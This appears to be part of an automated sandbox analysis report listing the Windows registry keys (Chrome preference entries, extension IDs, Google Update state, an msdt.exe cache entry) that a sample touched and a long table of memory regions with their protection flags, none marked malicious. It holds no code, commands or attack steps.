HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mfehgcgbbipciphmccgaenjidiccnmng
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
pkedcjkdefgpdelpbcmbmeomcjbeemfm
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blacklist_cache_md5_digest
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
There are 37 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1E93CA50000
|
heap
|
page read and write
|
|
|
|
1E93C9C4000
|
heap
|
page read and write
|
|
|
|
2AA2BF33000
|
heap
|
page read and write
|
||
|
1ACCD882000
|
heap
|
page read and write
|
||
|
18388F9B000
|
heap
|
page read and write
|
||
|
28B00970000
|
trusted library allocation
|
page read and write
|
||
|
18388682000
|
heap
|
page read and write
|
||
|
1E84A0F0000
|
heap
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
2AA26A75000
|
heap
|
page read and write
|
||
|
AC6C27E000
|
stack
|
page read and write
|
||
|
18388F9B000
|
heap
|
page read and write
|
||
|
2AA2BF30000
|
heap
|
page read and write
|
||
|
18389403000
|
heap
|
page read and write
|
||
|
1223F075000
|
heap
|
page read and write
|
||
|
26445462000
|
heap
|
page read and write
|
||
|
1D3DF30A000
|
heap
|
page read and write
|
||
|
2AA2BF15000
|
heap
|
page read and write
|
||
|
1D3DFA6D000
|
heap
|
page read and write
|
||
|
1E84A264000
|
heap
|
page read and write
|
||
|
2AA2D010000
|
heap
|
page read and write
|
||
|
1320AE29000
|
heap
|
page read and write
|
||
|
DA98AFB000
|
stack
|
page read and write
|
||
|
28B7FB30000
|
trusted library allocation
|
page read and write
|
||
|
140D8FE000
|
stack
|
page read and write
|
||
|
2AA26A8D000
|
heap
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
18388F84000
|
heap
|
page read and write
|
||
|
26445310000
|
heap
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
1E93CB39000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
9366AEB000
|
stack
|
page read and write
|
||
|
1E0F2402000
|
trusted library allocation
|
page read and write
|
||
|
1E84A240000
|
heap
|
page read and write
|
||
|
18ADC5F0000
|
heap
|
page read and write
|
||
|
18388F7A000
|
heap
|
page read and write
|
||
|
1D3DEA95000
|
heap
|
page read and write
|
||
|
18388F92000
|
heap
|
page read and write
|
||
|
2AA2BF40000
|
heap
|
page read and write
|
||
|
2AA2BE15000
|
heap
|
page read and write
|
||
|
28B7FB90000
|
heap
|
page read and write
|
||
|
178A2639000
|
heap
|
page read and write
|
||
|
2AA2BDD6000
|
trusted library allocation
|
page read and write
|
||
|
28B00BD0000
|
heap
|
page readonly
|
||
|
2AA26800000
|
heap
|
page read and write
|
||
|
18388FBD000
|
heap
|
page read and write
|
||
|
3EC5D77000
|
stack
|
page read and write
|
||
|
26445466000
|
heap
|
page read and write
|
||
|
2A90AC74000
|
heap
|
page read and write
|
||
|
2AA2C1D0000
|
trusted library allocation
|
page read and write
|
||
|
26445429000
|
heap
|
page read and write
|
||
|
178A2EC4000
|
heap
|
page read and write
|
||
|
1E84A275000
|
heap
|
page read and write
|
||
|
1D3DEBE0000
|
heap
|
page read and write
|
||
|
1320AD90000
|
trusted library allocation
|
page read and write
|
||
|
3EC5A7E000
|
stack
|
page read and write
|
||
|
1D3DEAA7000
|
heap
|
page read and write
|
||
|
2AA2C230000
|
trusted library allocation
|
page read and write
|
||
|
1D3DE810000
|
heap
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
1ACCD7E0000
|
heap
|
page read and write
|
||
|
EED6BFC000
|
stack
|
page read and write
|
||
|
1D3DFA43000
|
heap
|
page read and write
|
||
|
2A90AC4D000
|
heap
|
page read and write
|
||
|
1E84A274000
|
heap
|
page read and write
|
||
|
80AB87E000
|
stack
|
page read and write
|
||
|
1D3DE9B0000
|
trusted library allocation
|
page read and write
|
||
|
9366BEF000
|
stack
|
page read and write
|
||
|
1D3DFA02000
|
heap
|
page read and write
|
||
|
18ADCE02000
|
trusted library allocation
|
page read and write
|
||
|
26445500000
|
heap
|
page read and write
|
||
|
1D3DEBB7000
|
heap
|
page read and write
|
||
|
6D3E1FB000
|
stack
|
page read and write
|
||
|
178A265B000
|
heap
|
page read and write
|
||
|
2AA26A29000
|
heap
|
page read and write
|
||
|
18388716000
|
heap
|
page read and write
|
||
|
2AA2BF24000
|
heap
|
page read and write
|
||
|
178A2B50000
|
remote allocation
|
page read and write
|
||
|
18388FC2000
|
heap
|
page read and write
|
||
|
2AA26ABC000
|
heap
|
page read and write
|
||
|
2644545B000
|
heap
|
page read and write
|
||
|
183885A0000
|
trusted library allocation
|
page read and write
|
||
|
18389400000
|
heap
|
page read and write
|
||
|
1223EF60000
|
trusted library allocation
|
page read and write
|
||
|
1ACCD84B000
|
heap
|
page read and write
|
||
|
1838864B000
|
heap
|
page read and write
|
||
|
5515F7C000
|
stack
|
page read and write
|
||
|
178A26AD000
|
heap
|
page read and write
|
||
|
18388FB0000
|
heap
|
page read and write
|
||
|
9366B6E000
|
stack
|
page read and write
|
||
|
2AA2BE00000
|
heap
|
page read and write
|
||
|
1E84A26C000
|
heap
|
page read and write
|
||
|
18388F99000
|
heap
|
page read and write
|
||
|
9366FFB000
|
stack
|
page read and write
|
||
|
66DB4EB000
|
stack
|
page read and write
|
||
|
1632C150000
|
trusted library allocation
|
page read and write
|
||
|
2AA2BF70000
|
heap
|
page read and write
|
||
|
18388E02000
|
heap
|
page read and write
|
||
|
6D3E27D000
|
stack
|
page read and write
|
||
|
2A90AC81000
|
heap
|
page read and write
|
||
|
1ACCD860000
|
heap
|
page read and write
|
||
|
2A90AD08000
|
heap
|
page read and write
|
||
|
18388F69000
|
heap
|
page read and write
|
||
|
9366EFC000
|
stack
|
page read and write
|
||
|
1ACCDBB0000
|
heap
|
page read and write
|
||
|
1E93CAEF000
|
heap
|
page read and write
|
||
|
2AA2C3A0000
|
trusted library allocation
|
page read and write
|
||
|
1632C213000
|
heap
|
page read and write
|
||
|
1E84A302000
|
heap
|
page read and write
|
||
|
1D3DFA02000
|
heap
|
page read and write
|
||
|
1223F002000
|
heap
|
page read and write
|
||
|
1D3DFB00000
|
heap
|
page read and write
|
||
|
178A2692000
|
heap
|
page read and write
|
||
|
2AA2BF36000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
EED6AFE000
|
stack
|
page read and write
|
||
|
2AA271D0000
|
trusted library allocation
|
page read and write
|
||
|
1ACCD882000
|
heap
|
page read and write
|
||
|
1E84A29B000
|
heap
|
page read and write
|
||
|
2AA2BF1C000
|
heap
|
page read and write
|
||
|
1ACCD86E000
|
heap
|
page read and write
|
||
|
2AA2C124000
|
trusted library allocation
|
page read and write
|
||
|
2AA2BF2F000
|
heap
|
page read and write
|
||
|
2A90ABA0000
|
heap
|
page read and write
|
||
|
18ADC600000
|
heap
|
page read and write
|
||
|
1E84A237000
|
heap
|
page read and write
|
||
|
1ACCD87D000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
18388F91000
|
heap
|
page read and write
|
||
|
E7CA3FD000
|
stack
|
page read and write
|
||
|
1001FE000
|
stack
|
page read and write
|
||
|
18388F9B000
|
heap
|
page read and write
|
||
|
2AA2C210000
|
trusted library allocation
|
page read and write
|
||
|
178A25C0000
|
heap
|
page read and write
|
||
|
26445469000
|
heap
|
page read and write
|
||
|
2AA2BF2F000
|
heap
|
page read and write
|
||
|
93670F7000
|
stack
|
page read and write
|
||
|
1E0F1BE0000
|
heap
|
page read and write
|
||
|
AC6BD0B000
|
stack
|
page read and write
|
||
|
18388713000
|
heap
|
page read and write
|
||
|
17F8FB000
|
stack
|
page read and write
|
||
|
18388653000
|
heap
|
page read and write
|
||
|
1E0F1D13000
|
heap
|
page read and write
|
||
|
1E84A27B000
|
heap
|
page read and write
|
||
|
140D33B000
|
stack
|
page read and write
|
||
|
18ADC613000
|
heap
|
page read and write
|
||
|
28B7FF15000
|
heap
|
page read and write
|
||
|
2AA26960000
|
trusted library allocation
|
page read and write
|
||
|
17FEFF000
|
stack
|
page read and write
|
||
|
178A2EC2000
|
heap
|
page read and write
|
||
|
178A2605000
|
heap
|
page read and write
|
||
|
2AA2BF90000
|
heap
|
page read and write
|
||
|
28B00980000
|
trusted library allocation
|
page read and write
|
||
|
18388647000
|
heap
|
page read and write
|
||
|
1D3DEAED000
|
heap
|
page read and write
|
||
|
1223F02A000
|
heap
|
page read and write
|
||
|
936747F000
|
stack
|
page read and write
|
||
|
1D3DEA00000
|
heap
|
page read and write
|
||
|
183886EA000
|
heap
|
page read and write
|
||
|
18388F95000
|
heap
|
page read and write
|
||
|
18ADC646000
|
heap
|
page read and write
|
||
|
1D3DEBFC000
|
heap
|
page read and write
|
||
|
1E93E920000
|
heap
|
page read and write
|
||
|
2AA2739A000
|
heap
|
page read and write
|
||
|
1D3DFA00000
|
heap
|
page read and write
|
||
|
1D3DEA87000
|
heap
|
page read and write
|
||
|
1223EE60000
|
heap
|
page read and write
|
||
|
178A2692000
|
heap
|
page read and write
|
||
|
2AA27820000
|
trusted library section
|
page readonly
|
||
|
66DBD7B000
|
stack
|
page read and write
|
||
|
2AA27399000
|
heap
|
page read and write
|
||
|
2AA267F0000
|
heap
|
page read and write
|
||
|
E7C9DF9000
|
stack
|
page read and write
|
||
|
1E84A22E000
|
heap
|
page read and write
|
||
|
1632C288000
|
heap
|
page read and write
|
||
|
2AA27358000
|
heap
|
page read and write
|
||
|
1E941700000
|
trusted library allocation
|
page read and write
|
||
|
1E93CAEB000
|
heap
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
18388FAC000
|
heap
|
page read and write
|
||
|
18388F61000
|
heap
|
page read and write
|
||
|
18388FBC000
|
heap
|
page read and write
|
||
|
2AA27840000
|
trusted library section
|
page readonly
|
||
|
1E84A27A000
|
heap
|
page read and write
|
||
|
55167FF000
|
stack
|
page read and write
|
||
|
18ADC682000
|
heap
|
page read and write
|
||
|
2AA2C3C0000
|
trusted library allocation
|
page read and write
|
||
|
1D3DEAB0000
|
heap
|
page read and write
|
||
|
18388FBC000
|
heap
|
page read and write
|
||
|
1320AF02000
|
heap
|
page read and write
|
||
|
F26A2FB000
|
stack
|
page read and write
|
||
|
2A90AD13000
|
heap
|
page read and write
|
||
|
1ACCD865000
|
heap
|
page read and write
|
||
|
AC6C07E000
|
stack
|
page read and write
|
||
|
1E84A213000
|
heap
|
page read and write
|
||
|
1E84A22F000
|
heap
|
page read and write
|
||
|
1E93CA90000
|
heap
|
page read and write
|
||
|
1632C26D000
|
heap
|
page read and write
|
||
|
2AA2BF0D000
|
heap
|
page read and write
|
||
|
2AA2C340000
|
trusted library allocation
|
page read and write
|
||
|
18ADC64C000
|
heap
|
page read and write
|
||
|
2AA2C100000
|
trusted library allocation
|
page read and write
|
||
|
2AA2C10E000
|
trusted library allocation
|
page read and write
|
||
|
1632CB13000
|
heap
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
1E0F1C5A000
|
heap
|
page read and write
|
||
|
178A265C000
|
heap
|
page read and write
|
||
|
1D3DEABF000
|
heap
|
page read and write
|
||
|
2A90AC13000
|
heap
|
page read and write
|
||
|
2AA2BF1C000
|
heap
|
page read and write
|
||
|
140D9FE000
|
stack
|
page read and write
|
||
|
18388F9B000
|
heap
|
page read and write
|
||
|
18388F99000
|
heap
|
page read and write
|
||
|
1320AE13000
|
heap
|
page read and write
|
||
|
1D3DF335000
|
heap
|
page read and write
|
||
|
18388F21000
|
heap
|
page read and write
|
||
|
178A26B2000
|
heap
|
page read and write
|
||
|
2AA2BF2F000
|
heap
|
page read and write
|
||
|
18388F21000
|
heap
|
page read and write
|
||
|
80AB9FC000
|
stack
|
page read and write
|
||
|
18388F9E000
|
heap
|
page read and write
|
||
|
AC6C2F9000
|
stack
|
page read and write
|
||
|
E7C9F7F000
|
stack
|
page read and write
|
||
|
178A26AF000
|
heap
|
page read and write
|
||
|
26445481000
|
heap
|
page read and write
|
||
|
28B7FC09000
|
heap
|
page read and write
|
||
|
2AA26AFE000
|
heap
|
page read and write
|
||
|
2AA2C1F0000
|
trusted library allocation
|
page read and write
|
||
|
1D3DEAE5000
|
heap
|
page read and write
|
||
|
18388FC2000
|
heap
|
page read and write
|
||
|
2AA2BF2F000
|
heap
|
page read and write
|
||
|
2AA2BF8E000
|
heap
|
page read and write
|
||
|
EED6E77000
|
stack
|
page read and write
|
||
|
18388FCD000
|
heap
|
page read and write
|
||
|
2AA2BF33000
|
heap
|
page read and write
|
||
|
18ADC702000
|
heap
|
page read and write
|
||
|
18388F71000
|
heap
|
page read and write
|
||
|
84AD17E000
|
stack
|
page read and write
|
||
|
1320AC30000
|
heap
|
page read and write
|
||
|
1320ADC0000
|
remote allocation
|
page read and write
|
||
|
2AA27202000
|
heap
|
page read and write
|
||
|
28B7FC11000
|
heap
|
page read and write
|
||
|
1632C2B9000
|
heap
|
page read and write
|
||
|
1320AE00000
|
heap
|
page read and write
|
||
|
178A262B000
|
heap
|
page read and write
|
||
|
18388613000
|
heap
|
page read and write
|
||
|
28B7FD90000
|
heap
|
page read and write
|
||
|
1E0F1C00000
|
heap
|
page read and write
|
||
|
178A26A9000
|
heap
|
page read and write
|
||
|
1ACCD87C000
|
heap
|
page read and write
|
||
|
1632CB00000
|
heap
|
page read and write
|
||
|
1632C225000
|
heap
|
page read and write
|
||
|
1D3DEB13000
|
heap
|
page read and write
|
||
|
5515B1B000
|
stack
|
page read and write
|
||
|
1D3DEA52000
|
heap
|
page read and write
|
||
|
1C53F7E000
|
stack
|
page read and write
|
||
|
2AA2BDDC000
|
trusted library allocation
|
page read and write
|
||
|
18388649000
|
heap
|
page read and write
|
||
|
1D3DEB9D000
|
heap
|
page read and write
|
||
|
2AA2BF92000
|
heap
|
page read and write
|
||
|
2A90AC53000
|
heap
|
page read and write
|
||
|
28B7FC11000
|
heap
|
page read and write
|
||
|
1D3DEA3B000
|
heap
|
page read and write
|
||
|
84AD1FE000
|
stack
|
page read and write
|
||
|
2A90AB30000
|
heap
|
page read and write
|
||
|
1E0F1C68000
|
heap
|
page read and write
|
||
|
EED6C7E000
|
stack
|
page read and write
|
||
|
28B7FF19000
|
heap
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
1D3DEA23000
|
heap
|
page read and write
|
||
|
1E84A100000
|
heap
|
page read and write
|
||
|
1000FF000
|
stack
|
page read and write
|
||
|
1223EE00000
|
heap
|
page read and write
|
||
|
178A2605000
|
heap
|
page read and write
|
||
|
178A2EC1000
|
heap
|
page read and write
|
||
|
178A2690000
|
heap
|
page read and write
|
||
|
18388F66000
|
heap
|
page read and write
|
||
|
178A2690000
|
heap
|
page read and write
|
||
|
18ADC68C000
|
heap
|
page read and write
|
||
|
1E84A253000
|
heap
|
page read and write
|
||
|
178A2570000
|
heap
|
page read and write
|
||
|
26445477000
|
heap
|
page read and write
|
||
|
5EC16FD000
|
stack
|
page read and write
|
||
|
1320AE5C000
|
heap
|
page read and write
|
||
|
6D3E17E000
|
stack
|
page read and write
|
||
|
2AA2BDA0000
|
trusted library allocation
|
page read and write
|
||
|
E7CA17E000
|
stack
|
page read and write
|
||
|
28B00BC0000
|
trusted library allocation
|
page read and write
|
||
|
2AA2BDF0000
|
trusted library allocation
|
page read and write
|
||
|
1D3DE870000
|
heap
|
page read and write
|
||
|
1E93E5D0000
|
heap
|
page read and write
|
||
|
18388F56000
|
heap
|
page read and write
|
||
|
1E84A241000
|
heap
|
page read and write
|
||
|
1E93C990000
|
heap
|
page read and write
|
||
|
178A265C000
|
heap
|
page read and write
|
||
|
2AA2BF2F000
|
heap
|
page read and write
|
||
|
1E84A244000
|
heap
|
page read and write
|
||
|
2AA2BED1000
|
heap
|
page read and write
|
||
|
178A2690000
|
heap
|
page read and write
|
||
|
178A2639000
|
heap
|
page read and write
|
||
|
2AA27358000
|
heap
|
page read and write
|
||
|
2AA2BDD7000
|
trusted library allocation
|
page read and write
|
||
|
26445A70000
|
trusted library allocation
|
page read and write
|
||
|
28B7FBC8000
|
heap
|
page read and write
|
||
|
2AA2BF26000
|
heap
|
page read and write
|
||
|
18389420000
|
heap
|
page read and write
|
||
|
1E0F1C64000
|
heap
|
page read and write
|
||
|
18388F70000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
26445513000
|
heap
|
page read and write
|
||
|
2AA269D1000
|
trusted library allocation
|
page read and write
|
||
|
E7CA0FF000
|
stack
|
page read and write
|
||
|
28B7FBC0000
|
heap
|
page read and write
|
||
|
178A26A9000
|
heap
|
page read and write
|
||
|
18ADC590000
|
heap
|
page read and write
|
||
|
178A265C000
|
heap
|
page read and write
|
||
|
2A90B402000
|
trusted library allocation
|
page read and write
|
||
|
1838863C000
|
heap
|
page read and write
|
||
|
28B7FC20000
|
heap
|
page read and write
|
||
|
EED6A7E000
|
stack
|
page read and write
|
||
|
2644543C000
|
heap
|
page read and write
|
||
|
26445453000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
1D3DE970000
|
trusted library allocation
|
page read and write
|
||
|
1632C2BC000
|
heap
|
page read and write
|
||
|
2AA2C190000
|
trusted library allocation
|
page read and write
|
||
|
28B00C40000
|
trusted library allocation
|
page read and write
|
||
|
1E93E480000
|
heap
|
page read and write
|
||
|
55163FB000
|
stack
|
page read and write
|
||
|
1D3DF3D1000
|
heap
|
page read and write
|
||
|
28B7FF10000
|
heap
|
page read and write
|
||
|
2AA2BDD5000
|
trusted library allocation
|
page read and write
|
||
|
2A90ABD0000
|
trusted library allocation
|
page read and write
|
||
|
1ACCDBB5000
|
heap
|
page read and write
|
||
|
2AA2BDC0000
|
trusted library allocation
|
page read and write
|
||
|
1E84A252000
|
heap
|
page read and write
|
||
|
2AA2BF70000
|
heap
|
page read and write
|
||
|
1E84A246000
|
heap
|
page read and write
|
||
|
1E93CA93000
|
heap
|
page read and write
|
||
|
2644546A000
|
heap
|
page read and write
|
||
|
28B00000000
|
trusted library allocation
|
page read and write
|
||
|
2AA27830000
|
trusted library section
|
page readonly
|
||
|
1E84A247000
|
heap
|
page read and write
|
||
|
2AA2C108000
|
trusted library allocation
|
page read and write
|
||
|
AC6C0FE000
|
stack
|
page read and write
|
||
|
1E84A250000
|
heap
|
page read and write
|
||
|
2A90AC29000
|
heap
|
page read and write
|
||
|
26445468000
|
heap
|
page read and write
|
||
|
3EC60FF000
|
unkown
|
page read and write
|
||
|
2AA2BED9000
|
heap
|
page read and write
|
||
|
1ACCD86D000
|
heap
|
page read and write
|
||
|
2AA27215000
|
heap
|
page read and write
|
||
|
18388F9E000
|
heap
|
page read and write
|
||
|
2AA2BDD0000
|
trusted library allocation
|
page read and write
|
||
|
2AA2C3F0000
|
trusted library allocation
|
page read and write
|
||
|
2EA8EC50000
|
heap
|
page read and write
|
||
|
1E84A22D000
|
heap
|
page read and write
|
||
|
6D3E37F000
|
stack
|
page read and write
|
||
|
1E0F2340000
|
trusted library allocation
|
page read and write
|
||
|
1D3DEAA4000
|
heap
|
page read and write
|
||
|
1D3DEAC7000
|
heap
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
178A2639000
|
heap
|
page read and write
|
||
|
18388F91000
|
heap
|
page read and write
|
||
|
AC6C179000
|
stack
|
page read and write
|
||
|
18388F67000
|
heap
|
page read and write
|
||
|
178A2690000
|
heap
|
page read and write
|
||
|
1E0F1B80000
|
heap
|
page read and write
|
||
|
18388F69000
|
heap
|
page read and write
|
||
|
2A90AD00000
|
heap
|
page read and write
|
||
|
18ADC708000
|
heap
|
page read and write
|
||
|
1ACCD86E000
|
heap
|
page read and write
|
||
|
1ACCD861000
|
heap
|
page read and write
|
||
|
3EC607E000
|
stack
|
page read and write
|
||
|
18388656000
|
heap
|
page read and write
|
||
|
18388F97000
|
heap
|
page read and write
|
||
|
28B00900000
|
trusted library allocation
|
page read and write
|
||
|
18388F64000
|
heap
|
page read and write
|
||
|
18388FAC000
|
heap
|
page read and write
|
||
|
1E93C9C0000
|
heap
|
page read and write
|
||
|
26445502000
|
heap
|
page read and write
|
||
|
18388F99000
|
heap
|
page read and write
|
||
|
178A264E000
|
heap
|
page read and write
|
||
|
1223F000000
|
heap
|
page read and write
|
||
|
1D3DFA0A000
|
heap
|
page read and write
|
||
|
2EA8EE10000
|
heap
|
page read and write
|
||
|
1E84A200000
|
heap
|
page read and write
|
||
|
2AA2BF73000
|
heap
|
page read and write
|
||
|
183886E1000
|
heap
|
page read and write
|
||
|
6D3E2FC000
|
stack
|
page read and write
|
||
|
2AA2BDF0000
|
trusted library allocation
|
page read and write
|
||
|
18ADC713000
|
heap
|
page read and write
|
||
|
18388F63000
|
heap
|
page read and write
|
||
|
E7C9BFA000
|
stack
|
page read and write
|
||
|
1E84A245000
|
heap
|
page read and write
|
||
|
2AA2BF26000
|
heap
|
page read and write
|
||
|
E7C9FFE000
|
stack
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
1838866A000
|
heap
|
page read and write
|
||
|
1D3DEA9C000
|
heap
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
18388F00000
|
heap
|
page read and write
|
||
|
183886C7000
|
heap
|
page read and write
|
||
|
2AA2D000000
|
heap
|
page read and write
|
||
|
EED707F000
|
stack
|
page read and write
|
||
|
1223F03D000
|
heap
|
page read and write
|
||
|
1C5417D000
|
stack
|
page read and write
|
||
|
2AA2C190000
|
trusted library allocation
|
page read and write
|
||
|
E7C9CFF000
|
stack
|
page read and write
|
||
|
2AA27358000
|
heap
|
page read and write
|
||
|
80AB97F000
|
stack
|
page read and write
|
||
|
1C5407E000
|
stack
|
page read and write
|
||
|
66DBB7C000
|
stack
|
page read and write
|
||
|
DA983CB000
|
stack
|
page read and write
|
||
|
178A2420000
|
heap
|
page read and write
|
||
|
1838864C000
|
heap
|
page read and write
|
||
|
2AA27810000
|
trusted library section
|
page readonly
|
||
|
18388F69000
|
heap
|
page read and write
|
||
|
2AA2BE8F000
|
heap
|
page read and write
|
||
|
2AA27399000
|
heap
|
page read and write
|
||
|
1ACCD840000
|
heap
|
page read and write
|
||
|
66DBC7F000
|
stack
|
page read and write
|
||
|
2AA2BF2F000
|
heap
|
page read and write
|
||
|
1320ADC0000
|
remote allocation
|
page read and write
|
||
|
2AA27D60000
|
trusted library allocation
|
page read and write
|
||
|
2644545D000
|
heap
|
page read and write
|
||
|
178A26AA000
|
heap
|
page read and write
|
||
|
2AA2BE3F000
|
heap
|
page read and write
|
||
|
2AA27358000
|
heap
|
page read and write
|
||
|
1320ADC0000
|
remote allocation
|
page read and write
|
||
|
2AA2BD63000
|
trusted library allocation
|
page read and write
|
||
|
1E0F1C13000
|
heap
|
page read and write
|
||
|
18388708000
|
heap
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
2AA271E0000
|
trusted library allocation
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
1D3DF202000
|
heap
|
page read and write
|
||
|
183884A0000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
1ACCD7C0000
|
heap
|
page read and write
|
||
|
2AA2BE1F000
|
heap
|
page read and write
|
||
|
E7CA57F000
|
stack
|
page read and write
|
||
|
17FAFC000
|
stack
|
page read and write
|
||
|
1E84A283000
|
heap
|
page read and write
|
||
|
1E84A224000
|
heap
|
page read and write
|
||
|
5EC18FE000
|
stack
|
page read and write
|
||
|
1C53C7C000
|
stack
|
page read and write
|
||
|
18388F9E000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
5EC167B000
|
stack
|
page read and write
|
||
|
AC6C1F9000
|
stack
|
page read and write
|
||
|
2AA2BF70000
|
heap
|
page read and write
|
||
|
66DBEFF000
|
stack
|
page read and write
|
||
|
1D3DFB13000
|
heap
